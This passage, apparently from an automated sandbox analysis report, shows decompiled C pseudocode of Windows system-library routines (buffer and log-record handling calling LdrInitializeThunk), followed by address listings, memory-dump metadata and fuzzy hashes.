                                                                                                                                                      							L54:
                                                                                                                                                      							return _a4;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _a12 - 1;
                                                                                                                                                      						if(_a12 != 1) {
                                                                                                                                                      							 *_t372 = _v16;
                                                                                                                                                      							_t251 = 4;
                                                                                                                                                      							 *((short*)(_t372 + 0x36)) = _t251;
                                                                                                                                                      							 *((short*)(_t372 + 0x34)) = 1;
                                                                                                                                                      							_t253 = _v28;
                                                                                                                                                      							 *((char*)(_t372 + 0x29)) = 8;
                                                                                                                                                      							 *(_t372 + 0x30) = _t253;
                                                                                                                                                      							__eflags = _v5;
                                                                                                                                                      							if(_v5 != 0) {
                                                                                                                                                      								_t254 = _v32;
                                                                                                                                                      								_t254[8] =  *(_t370 + 0xcc) & 0x00101000 | 0x00010001;
                                                                                                                                                      								_t254[9] = 1;
                                                                                                                                                      								 *_t254 =  *(_t370 + 0x80);
                                                                                                                                                      								 *((char*)(_t372 + 0x6e)) = 1;
                                                                                                                                                      								 *((char*)(_t372 + 0x6f)) = 5;
                                                                                                                                                      								__eflags = _t254[0xb] - 8;
                                                                                                                                                      								if(_t254[0xb] != 8) {
                                                                                                                                                      									_t187 =  &(_t254[0x42]); // 0xf938e834
                                                                                                                                                      									_t255 =  *_t187;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t186 =  &(_t254[0x44]); // 0x14538910
                                                                                                                                                      									_t255 =  *_t186;
                                                                                                                                                      								}
                                                                                                                                                      								 *(_t370 + 0x10) = _t255;
                                                                                                                                                      								E00912340(_t341, _a8, _v24);
                                                                                                                                                      								L39:
                                                                                                                                                      								_t257 =  *(_t372 + 0x30);
                                                                                                                                                      								_t342 = _v16;
                                                                                                                                                      								__eflags = _t257 - _t342;
                                                                                                                                                      								if(_t257 < _t342) {
                                                                                                                                                      									__eflags = _t257 - 0x48;
                                                                                                                                                      									if(_t257 > 0x48) {
                                                                                                                                                      										__eflags = _t257 + _t372;
                                                                                                                                                      										E0091DFC0(_t257 + _t372, 0xff, _t342 - _t257);
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(_t342);
                                                                                                                                                      								_push(_t372);
                                                                                                                                                      								_t348 =  &_v60;
                                                                                                                                                      								_push( &_v60);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_push(0);
                                                                                                                                                      								_t259 = E0090F938(_v12);
                                                                                                                                                      								_a4 = _t259;
                                                                                                                                                      								__eflags = _t259;
                                                                                                                                                      								if(_t259 < 0) {
                                                                                                                                                      									goto L49;
                                                                                                                                                      								} else {
                                                                                                                                                      									_t260 =  *(_t370 + 0xc8);
                                                                                                                                                      									__eflags = _t260;
                                                                                                                                                      									if(_t260 == 0) {
                                                                                                                                                      										L48:
                                                                                                                                                      										_t348 = _v12;
                                                                                                                                                      										 *(_t370 + 0x100) = 1;
                                                                                                                                                      										 *(_t370 + 0xd8) = 1;
                                                                                                                                                      										__eflags = 0;
                                                                                                                                                      										 *(_t370 + 0xf0) = _t342;
                                                                                                                                                      										 *(_t370 + 0xf4) = 0;
                                                                                                                                                      										 *(_t370 + 0xe8) = _t342;
                                                                                                                                                      										 *(_t370 + 0xec) = 0;
                                                                                                                                                      										 *(_t370 + 0x5c) = _v12;
                                                                                                                                                      										_v12 = 0;
                                                                                                                                                      										goto L49;
                                                                                                                                                      									}
                                                                                                                                                      									_t352 =  *(_t370 + 0xcc);
                                                                                                                                                      									__eflags = _t352 & 0x00000020;
                                                                                                                                                      									if((_t352 & 0x00000020) == 0) {
                                                                                                                                                      										goto L48;
                                                                                                                                                      									}
                                                                                                                                                      									__eflags = _t352 & 0x00002000;
                                                                                                                                                      									_t348 = 0x400;
                                                                                                                                                      									if((_t352 & 0x00002000) == 0) {
                                                                                                                                                      										_t348 = 0x100000;
                                                                                                                                                      									}
                                                                                                                                                      									_push(0x14);
                                                                                                                                                      									_v40 = _t260 * _t348;
                                                                                                                                                      									_push(8);
                                                                                                                                                      									_push( &_v40);
                                                                                                                                                      									_push( &_v60);
                                                                                                                                                      									_v36 = _t260 * _t348 >> 0x20;
                                                                                                                                                      									_t267 = E0090FC48(_v12);
                                                                                                                                                      									_a4 = _t267;
                                                                                                                                                      									__eflags = _t267;
                                                                                                                                                      									if(_t267 < 0) {
                                                                                                                                                      										goto L49;
                                                                                                                                                      									} else {
                                                                                                                                                      										goto L48;
                                                                                                                                                      									}
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							 *((intOrPtr*)(_t341 + 4)) = _t253 + 0xffffffb8;
                                                                                                                                                      							 *_t341 = 0xc0010000;
                                                                                                                                                      							_t271 =  *(_t370 + 0x10);
                                                                                                                                                      							__eflags = _t271 - 2;
                                                                                                                                                      							if(_t271 != 2) {
                                                                                                                                                      								__eflags = _t271 - 3;
                                                                                                                                                      								if(_t271 != 3) {
                                                                                                                                                      									_v48 = 0;
                                                                                                                                                      									_v44 = 0;
                                                                                                                                                      									E00922954(1, _t372,  &_v48);
                                                                                                                                                      									 *(_t341 + 0x10) = _v48;
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 0x14)) = _v44;
                                                                                                                                                      									L34:
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 0xc)) = _v164;
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 8)) = _v160;
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 0x18)) = E00954FC0(_v84, _v80, _v140, 0);
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 0x1c)) = E00954FC0(_v76, _v72, _v140, 0);
                                                                                                                                                      									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
                                                                                                                                                      									 *((char*)(_t372 + 0x6c)) =  *((intOrPtr*)(_t281 + 0xa4));
                                                                                                                                                      									 *((char*)(_t372 + 0x6d)) =  *((intOrPtr*)(_t281 + 0xa8));
                                                                                                                                                      									 *((char*)(_t372 + 0x6e)) = 1;
                                                                                                                                                      									 *((char*)(_t372 + 0x6f)) = 5;
                                                                                                                                                      									 *(_t372 + 0x70) =  *(_t281 + 0xac) & 0x0000ffff;
                                                                                                                                                      									 *(_t372 + 0x170) =  *(_t370 + 0x10);
                                                                                                                                                      									 *(_t372 + 0x74) =  *(_t370 + 0x7c);
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x90)) = 1;
                                                                                                                                                      									 *(_t372 + 0x8c) = 1;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x94)) = 4;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x68)) = _v16;
                                                                                                                                                      									 *(_t372 + 0x84) =  *(_t370 + 0xc8);
                                                                                                                                                      									 *(_t372 + 0x88) =  *(_t370 + 0xcc);
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x80)) = _v140;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x158)) = _v220;
                                                                                                                                                      									 *(_t372 + 0xa0) =  *(_t372 + 0xa0) & 0x00000000;
                                                                                                                                                      									 *(_t372 + 0xa4) =  *(_t372 + 0xa4) & 0x00000000;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x15c)) = _v216;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x9c)) = _v20;
                                                                                                                                                      									_t163 = _t372 + 0x178; // 0x178
                                                                                                                                                      									E00912340(_t163,  *((intOrPtr*)(_t370 + 0x64)), ( *(_t370 + 0x60) & 0x0000ffff) + 2);
                                                                                                                                                      									E00912340(( *(_t370 + 0x60) & 0x0000ffff) + _t372 + 0x17a,  *((intOrPtr*)(_t370 + 0x6c)), ( *(_t370 + 0x68) & 0x0000ffff) + 2);
                                                                                                                                                      									_t169 = _t372 + 0xa8; // 0xa8
                                                                                                                                                      									E009CE649(0, _t370, _t372, _t169);
                                                                                                                                                      									_t170 = _t372 + 0x160; // 0x160
                                                                                                                                                      									E0092B2FA(_v16, 0, _t170);
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x168)) =  *_t370;
                                                                                                                                                      									 *((intOrPtr*)(_t372 + 0x16c)) =  *((intOrPtr*)(_t370 + 4));
                                                                                                                                                      									 *(_t341 + 0x10) =  *(_t370 + 8);
                                                                                                                                                      									 *((intOrPtr*)(_t341 + 0x14)) =  *((intOrPtr*)(_t370 + 0xc));
                                                                                                                                                      									goto L39;
                                                                                                                                                      								}
                                                                                                                                                      								asm("rdtsc");
                                                                                                                                                      								L32:
                                                                                                                                                      								 *(_t341 + 0x10) = _t271;
                                                                                                                                                      								 *((intOrPtr*)(_t341 + 0x14)) = 0;
                                                                                                                                                      								goto L34;
                                                                                                                                                      							}
                                                                                                                                                      							_t271 = E009CBCFC();
                                                                                                                                                      							goto L32;
                                                                                                                                                      						}
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_push( &_v68);
                                                                                                                                                      						_push(_v16);
                                                                                                                                                      						_push(_t372);
                                                                                                                                                      						_push( &_v60);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_v68 = 0;
                                                                                                                                                      						_v64 = 0;
                                                                                                                                                      						_t314 = E0090F900(_v12);
                                                                                                                                                      						_a4 = _t314;
                                                                                                                                                      						__eflags = _t314;
                                                                                                                                                      						if(_t314 < 0) {
                                                                                                                                                      							goto L49;
                                                                                                                                                      						}
                                                                                                                                                      						_t316 =  *(_t372 + 0x88) >> 1;
                                                                                                                                                      						__eflags = _t316 & 0x00000001;
                                                                                                                                                      						if((_t316 & 0x00000001) == 0) {
                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t372 + 0x6c)) -  *0x7ffe026c;
                                                                                                                                                      							if( *((intOrPtr*)(_t372 + 0x6c)) !=  *0x7ffe026c) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t372 + 0x6d)) -  *0x7ffe0270;
                                                                                                                                                      							if( *((intOrPtr*)(_t372 + 0x6d)) !=  *0x7ffe0270) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags =  *((intOrPtr*)(_t372 + 0x94)) - 4;
                                                                                                                                                      							if( *((intOrPtr*)(_t372 + 0x94)) != 4) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							_t319 =  *((intOrPtr*)(_t372 + 0x68));
                                                                                                                                                      							_t343 =  *(_t372 + 0x8c);
                                                                                                                                                      							_v16 = _t319;
                                                                                                                                                      							__eflags = _t319 + 0xfffffc00 - 0xffc00;
                                                                                                                                                      							if(_t319 + 0xfffffc00 > 0xffc00) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _t343;
                                                                                                                                                      							if(_t343 == 0) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							_t348 =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                      							__eflags =  *(_t372 + 0x78) |  *(_t372 + 0x7c);
                                                                                                                                                      							if(( *(_t372 + 0x78) |  *(_t372 + 0x7c)) == 0) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							_t348 =  *(_t372 + 0x74);
                                                                                                                                                      							__eflags =  *(_t372 + 0x74) -  *(_t370 + 0x7c);
                                                                                                                                                      							if( *(_t372 + 0x74) !=  *(_t370 + 0x7c)) {
                                                                                                                                                      								goto L18;
                                                                                                                                                      							}
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push( &_v68);
                                                                                                                                                      							 *(_t372 + 0x78) = 0;
                                                                                                                                                      							 *(_t372 + 0x7c) = 0;
                                                                                                                                                      							_push( *(_t370 + 0x80));
                                                                                                                                                      							_t348 =  &_v60;
                                                                                                                                                      							_push(_t372);
                                                                                                                                                      							_push( &_v60);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_push(0);
                                                                                                                                                      							_t322 = E0090F938(_v12);
                                                                                                                                                      							 *(_t370 + 0xec) =  *(_t370 + 0xec) & 0x00000000;
                                                                                                                                                      							_a4 = _t322;
                                                                                                                                                      							_t323 = _v16;
                                                                                                                                                      							 *(_t370 + 0x100) = _t343;
                                                                                                                                                      							 *(_t370 + 0xd8) = _t343;
                                                                                                                                                      							 *(_t370 + 0xf4) =  *(_t370 + 0xf4) & 0x00000000;
                                                                                                                                                      							 *(_t370 + 0x80) = _t323;
                                                                                                                                                      							 *(_t370 + 0xe8) = _t323;
                                                                                                                                                      							 *(_t370 + 0xf0) = _t343 * _t323;
                                                                                                                                                      							 *(_t370 + 0x5c) = _v12;
                                                                                                                                                      							goto L51;
                                                                                                                                                      						}
                                                                                                                                                      						L18:
                                                                                                                                                      						_a4 = 0xc000000d;
                                                                                                                                                      						goto L49;
                                                                                                                                                      					}
                                                                                                                                                      					_a4 = 0xc0000017;
                                                                                                                                                      					goto L52;
                                                                                                                                                      				}
                                                                                                                                                      				_push(_t340);
                                                                                                                                                      				_push(0x2c);
                                                                                                                                                      				_push( &_v144);
                                                                                                                                                      				_t326 = E0090FDC0(_t340);
                                                                                                                                                      				_a4 = _t326;
                                                                                                                                                      				if(_t326 < _t340) {
                                                                                                                                                      					goto L54;
                                                                                                                                                      				}
                                                                                                                                                      				_push(_t340);
                                                                                                                                                      				_push(0x1c);
                                                                                                                                                      				_push( &_v172);
                                                                                                                                                      				_push(_t340);
                                                                                                                                                      				_t328 = E0090FC18(0xfffffffe);
                                                                                                                                                      				_a4 = _t328;
                                                                                                                                                      				if(_t328 < _t340) {
                                                                                                                                                      					goto L54;
                                                                                                                                                      				}
                                                                                                                                                      				_push(_t340);
                                                                                                                                                      				_push(0x20);
                                                                                                                                                      				_push( &_v100);
                                                                                                                                                      				_push(1);
                                                                                                                                                      				_t330 = E0090FC18(0xfffffffe);
                                                                                                                                                      				_a4 = _t330;
                                                                                                                                                      				if(_t330 < _t340) {
                                                                                                                                                      					goto L54;
                                                                                                                                                      				}
                                                                                                                                                      				_push(_t340);
                                                                                                                                                      				_push(0x30);
                                                                                                                                                      				_push( &_v220);
                                                                                                                                                      				_t332 = E0090FDC0(3);
                                                                                                                                                      				_a4 = _t332;
                                                                                                                                                      				if(_t332 < _t340) {
                                                                                                                                                      					goto L54;
                                                                                                                                                      				}
                                                                                                                                                      				_t334 = E00968001(_t348, _t360, _t370, _t340,  &_v20);
                                                                                                                                                      				_a4 = _t334;
                                                                                                                                                      				if(_t334 < _t340) {
                                                                                                                                                      					goto L54;
                                                                                                                                                      				}
                                                                                                                                                      				_t348 =  *(_t370 + 0x60) & 0x0000ffff;
                                                                                                                                                      				_t238 = ( *(_t370 + 0x68) & 0x0000ffff) + ( *(_t370 + 0x60) & 0x0000ffff) + 0x17c;
                                                                                                                                                      				goto L12;
                                                                                                                                                      			}
                                                                                                                                                      0x009cef4e
                                                                                                                                                      0x009cef54
                                                                                                                                                      0x009cef5a
                                                                                                                                                      0x009cef5d
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cef5d
                                                                                                                                                      0x009ceeee
                                                                                                                                                      0x009ceef4
                                                                                                                                                      0x009ceef7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceef9
                                                                                                                                                      0x009ceeff
                                                                                                                                                      0x009cef04
                                                                                                                                                      0x009cef06
                                                                                                                                                      0x009cef06
                                                                                                                                                      0x009cef0d
                                                                                                                                                      0x009cef0f
                                                                                                                                                      0x009cef12
                                                                                                                                                      0x009cef17
                                                                                                                                                      0x009cef1b
                                                                                                                                                      0x009cef1f
                                                                                                                                                      0x009cef22
                                                                                                                                                      0x009cef27
                                                                                                                                                      0x009cef2a
                                                                                                                                                      0x009cef2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cef2c
                                                                                                                                                      0x009ceee2
                                                                                                                                                      0x009cecba
                                                                                                                                                      0x009cecbd
                                                                                                                                                      0x009cecc3
                                                                                                                                                      0x009cecc6
                                                                                                                                                      0x009cecc9
                                                                                                                                                      0x009cecd2
                                                                                                                                                      0x009cecd5
                                                                                                                                                      0x009cece5
                                                                                                                                                      0x009cece8
                                                                                                                                                      0x009ceceb
                                                                                                                                                      0x009cecf3
                                                                                                                                                      0x009cecf9
                                                                                                                                                      0x009cecfc
                                                                                                                                                      0x009ced02
                                                                                                                                                      0x009ced0d
                                                                                                                                                      0x009ced23
                                                                                                                                                      0x009ced37
                                                                                                                                                      0x009ced40
                                                                                                                                                      0x009ced49
                                                                                                                                                      0x009ced52
                                                                                                                                                      0x009ced58
                                                                                                                                                      0x009ced5c
                                                                                                                                                      0x009ced67
                                                                                                                                                      0x009ced6d
                                                                                                                                                      0x009ced76
                                                                                                                                                      0x009ced7c
                                                                                                                                                      0x009ced82
                                                                                                                                                      0x009ced88
                                                                                                                                                      0x009ced92
                                                                                                                                                      0x009ced9b
                                                                                                                                                      0x009ceda7
                                                                                                                                                      0x009cedb3
                                                                                                                                                      0x009cedbf
                                                                                                                                                      0x009cedcb
                                                                                                                                                      0x009cedd2
                                                                                                                                                      0x009cedd9
                                                                                                                                                      0x009cede2
                                                                                                                                                      0x009cedf2
                                                                                                                                                      0x009cedf9
                                                                                                                                                      0x009cee14
                                                                                                                                                      0x009cee1c
                                                                                                                                                      0x009cee23
                                                                                                                                                      0x009cee28
                                                                                                                                                      0x009cee2f
                                                                                                                                                      0x009cee36
                                                                                                                                                      0x009cee3f
                                                                                                                                                      0x009cee48
                                                                                                                                                      0x009cee4e
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cee4e
                                                                                                                                                      0x009cecd7
                                                                                                                                                      0x009cecd9
                                                                                                                                                      0x009cecd9
                                                                                                                                                      0x009cecdc
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cecdc
                                                                                                                                                      0x009ceccb
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009ceccb
                                                                                                                                                      0x009ceba0
                                                                                                                                                      0x009ceba4
                                                                                                                                                      0x009ceba5
                                                                                                                                                      0x009cebab
                                                                                                                                                      0x009cebac
                                                                                                                                                      0x009cebad
                                                                                                                                                      0x009cebae
                                                                                                                                                      0x009cebaf
                                                                                                                                                      0x009cebb3
                                                                                                                                                      0x009cebb6
                                                                                                                                                      0x009cebb9
                                                                                                                                                      0x009cebbe
                                                                                                                                                      0x009cebc1
                                                                                                                                                      0x009cebc3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebcf
                                                                                                                                                      0x009cebd1
                                                                                                                                                      0x009cebd3
                                                                                                                                                      0x009cebe4
                                                                                                                                                      0x009cebea
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebef
                                                                                                                                                      0x009cebf5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebf7
                                                                                                                                                      0x009cebfe
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec00
                                                                                                                                                      0x009cec03
                                                                                                                                                      0x009cec09
                                                                                                                                                      0x009cec11
                                                                                                                                                      0x009cec16
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec1a
                                                                                                                                                      0x009cec1c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec21
                                                                                                                                                      0x009cec21
                                                                                                                                                      0x009cec24
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec26
                                                                                                                                                      0x009cec29
                                                                                                                                                      0x009cec2c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec2e
                                                                                                                                                      0x009cec32
                                                                                                                                                      0x009cec33
                                                                                                                                                      0x009cec36
                                                                                                                                                      0x009cec39
                                                                                                                                                      0x009cec3f
                                                                                                                                                      0x009cec42
                                                                                                                                                      0x009cec43
                                                                                                                                                      0x009cec44
                                                                                                                                                      0x009cec45
                                                                                                                                                      0x009cec46
                                                                                                                                                      0x009cec4a
                                                                                                                                                      0x009cec4f
                                                                                                                                                      0x009cec56
                                                                                                                                                      0x009cec59
                                                                                                                                                      0x009cec5c
                                                                                                                                                      0x009cec62
                                                                                                                                                      0x009cec6b
                                                                                                                                                      0x009cec72
                                                                                                                                                      0x009cec78
                                                                                                                                                      0x009cec81
                                                                                                                                                      0x009cec87
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cec87
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x00000000
                                                                                                                                                      0x009cebd5
                                                                                                                                                      0x009ceb5e
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CED1C
                                                                                                                                                      • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 009CED32
                                                                                                                                                        • Part of subcall function 0090F900: LdrInitializeThunk.NTDLL ref: 0090F90E
                                                                                                                                                      Strings
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000005.00000002.2218172040.0000000000900000.00000040.00000001.sdmp, Offset: 008F0000, based on PE: true
                                                                                                                                                      • Associated: 00000005.00000002.2218167906.00000000008F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218237266.00000000009E0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218241028.00000000009F0000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218246476.00000000009F4000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218251764.00000000009F7000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218255269.0000000000A00000.00000040.00000001.sdmp
                                                                                                                                                      • Associated: 00000005.00000002.2218289035.0000000000A60000.00000040.00000001.sdmp
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                      • String ID: athan
                                                                                                                                                      • API String ID: 1404860816-369431050
                                                                                                                                                      • Opcode ID: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                      • Instruction ID: df430a9aedf43e2686576f2117c0842302b29553c2768913a5a3835e38617c8d
                                                                                                                                                      • Opcode Fuzzy Hash: 9e2cc6addef524c309cc4af5253d67362ac08711b9c8f7f376d8fa5e594f3f82
                                                                                                                                                      • Instruction Fuzzy Hash: 2F022AB1900649AFDB55DF64C880FEABBF8FF08300F00856EE99AD7251D734A955CB61
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      C-Code - Quality: 86%
                                                                                                                                                      			E009CC371(void* __ecx, intOrPtr __edx, intOrPtr _a4, signed int _a8, short _a12) {
                                                                                                                                                      				signed int _v8;
                                                                                                                                                      				intOrPtr _v12;
                                                                                                                                                      				signed int _v16;
                                                                                                                                                      				char _v24;
                                                                                                                                                      				intOrPtr _t57;
                                                                                                                                                      				short _t58;
                                                                                                                                                      				intOrPtr _t61;
                                                                                                                                                      				signed char _t63;
                                                                                                                                                      				signed int _t65;
                                                                                                                                                      				signed int _t74;
                                                                                                                                                      				signed int _t75;
                                                                                                                                                      				intOrPtr* _t76;
                                                                                                                                                      				signed int _t80;
                                                                                                                                                      				signed int _t82;
                                                                                                                                                      				intOrPtr _t87;
                                                                                                                                                      				signed int _t89;
                                                                                                                                                      				signed int _t90;
                                                                                                                                                      				intOrPtr* _t91;
                                                                                                                                                      				signed int _t93;
                                                                                                                                                      				signed int _t94;
                                                                                                                                                      				intOrPtr _t97;
                                                                                                                                                      
                                                                                                                                                      				_t87 = __edx;
                                                                                                                                                      				_v16 = _v16 & 0x00000000;
                                                                                                                                                      				_v8 = _v8 & 0x00000000;
                                                                                                                                                      				_t80 = _a8;
                                                                                                                                                      				_t57 =  *((intOrPtr*)(_t80 + 4));
                                                                                                                                                      				if(_t57 <= 0) {
                                                                                                                                                      					_t57 =  *((intOrPtr*)(_t80 + 8));
                                                                                                                                                      				}
                                                                                                                                                      				_t97 = _a4;
                                                                                                                                                      				 *((intOrPtr*)(_t80 + 0x30)) = _t57;
                                                                                                                                                      				_t89 =  *((intOrPtr*)(_t97 + 0x80));
                                                                                                                                                      				_t58 = _a12;
                                                                                                                                                      				_a8 = _t89;
                                                                                                                                                      				if(_t57 != 0x48 || _t58 == 1) {
                                                                                                                                                      					 *((short*)(_t80 + 0x34)) = _t58;
                                                                                                                                                      					 *((intOrPtr*)(_t80 + 0x10)) = E009CBCFC();
                                                                                                                                                      					 *((intOrPtr*)(_t80 + 0x14)) = _t87;
                                                                                                                                                      					__eflags =  *(_t97 + 0x5c);
                                                                                                                                                      					if( *(_t97 + 0x5c) == 0) {
                                                                                                                                                      						goto L25;
                                                                                                                                                      					}
                                                                                                                                                      					_t61 =  *((intOrPtr*)(_t80 + 0x30));
                                                                                                                                                      					__eflags = _t61 - _t89;
                                                                                                                                                      					if(_t61 < _t89) {
                                                                                                                                                      						_t78 = _t61 + _t80;
                                                                                                                                                      						__eflags = _t61 + _t80;
                                                                                                                                                      						E0091DFC0(_t78, 0xff, _t89 - _t61);
                                                                                                                                                      					}
                                                                                                                                                      					_t90 =  *(_t97 + 0xcc);
                                                                                                                                                      					_t63 = _t90 >> 3;
                                                                                                                                                      					__eflags = _t63 & 0x00000001;
                                                                                                                                                      					if((_t63 & 0x00000001) != 0) {
                                                                                                                                                      						_v16 = 2;
                                                                                                                                                      					}
                                                                                                                                                      					_t82 =  *(_t97 + 0xc8);
                                                                                                                                                      					__eflags = _t82;
                                                                                                                                                      					if(_t82 <= 0) {
                                                                                                                                                      						L18:
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t91 = _t97 + 0xf0;
                                                                                                                                                      						_push(_t91);
                                                                                                                                                      						_push(_a8);
                                                                                                                                                      						_push(_t80);
                                                                                                                                                      						_push( &_v24);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_push(0);
                                                                                                                                                      						_t65 = E0090F938( *(_t97 + 0x5c));
                                                                                                                                                      						_v8 = _t65;
                                                                                                                                                      						__eflags = _t65;
                                                                                                                                                      						if(_t65 < 0) {
                                                                                                                                                      							__eflags = _t65 - 0x80000022;
                                                                                                                                                      							if(_t65 == 0x80000022) {
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							__eflags = _v8 - 2;
                                                                                                                                                      							if(_v8 == 2) {
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							goto L24;
                                                                                                                                                      						}
                                                                                                                                                      						 *_t91 =  *_t91 + _a8;
                                                                                                                                                      						asm("adc dword [edi+0x4], 0x0");
                                                                                                                                                      						 *((intOrPtr*)(_t97 + 0x100)) =  *((intOrPtr*)(_t97 + 0x100)) + 1;
                                                                                                                                                      						 *((intOrPtr*)(_t97 + 0xd8)) =  *((intOrPtr*)(_t97 + 0xd8)) + 1;
                                                                                                                                                      						goto L25;
                                                                                                                                                      					} else {
                                                                                                                                                      						asm("sbb eax, eax");
                                                                                                                                                      						asm("cdq");
                                                                                                                                                      						_v12 = E0093F1E0(( ~(_t90 & 0x00002000) & 0xfff00400) + 0x100000, _t87, _t82, 0);
                                                                                                                                                      						_t74 =  *((intOrPtr*)(_t97 + 0xd8)) + _v16;
                                                                                                                                                      						_t75 = _t74 * _a8;
                                                                                                                                                      						__eflags = _t74 * _a8 >> 0x20 - _t87;
                                                                                                                                                      						if(__eflags < 0) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						if(__eflags > 0) {
                                                                                                                                                      							L14:
                                                                                                                                                      							_t93 = (_t90 & 0x0000000b) - 1;
                                                                                                                                                      							__eflags = _t93;
                                                                                                                                                      							if(_t93 == 0) {
                                                                                                                                                      								_v8 = 0xc0000188;
                                                                                                                                                      								L24:
                                                                                                                                                      								_t54 = _t97 + 0xfc;
                                                                                                                                                      								 *_t54 =  *(_t97 + 0xfc) + 1;
                                                                                                                                                      								__eflags =  *_t54;
                                                                                                                                                      								goto L25;
                                                                                                                                                      							}
                                                                                                                                                      							_t94 = _t93 - 1;
                                                                                                                                                      							__eflags = _t94;
                                                                                                                                                      							if(_t94 == 0) {
                                                                                                                                                      								_t76 = _t97 + 0xe8;
                                                                                                                                                      								 *((intOrPtr*)(_t97 + 0xf0)) =  *_t76;
                                                                                                                                                      								_t86 =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                      								 *((intOrPtr*)(_t97 + 0xf4)) =  *((intOrPtr*)(_t76 + 4));
                                                                                                                                                      								 *((intOrPtr*)(_t97 + 0xd8)) = E00954FC0( *_t76, _t86,  *((intOrPtr*)(_t97 + 0x80)), 0);
                                                                                                                                                      							} else {
                                                                                                                                                      								__eflags = _t94 == 6;
                                                                                                                                                      								if(_t94 == 6) {
                                                                                                                                                      									_t34 = _t97 + 0xd4;
                                                                                                                                                      									 *_t34 =  *(_t97 + 0xd4) | 0x00000001;
                                                                                                                                                      									__eflags =  *_t34;
                                                                                                                                                      								}
                                                                                                                                                      							}
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						__eflags = _t75 - _v12;
                                                                                                                                                      						if(_t75 < _v12) {
                                                                                                                                                      							goto L18;
                                                                                                                                                      						}
                                                                                                                                                      						goto L14;
                                                                                                                                                      					}
                                                                                                                                                      				} else {
                                                                                                                                                      					_v8 = 0x80000022;
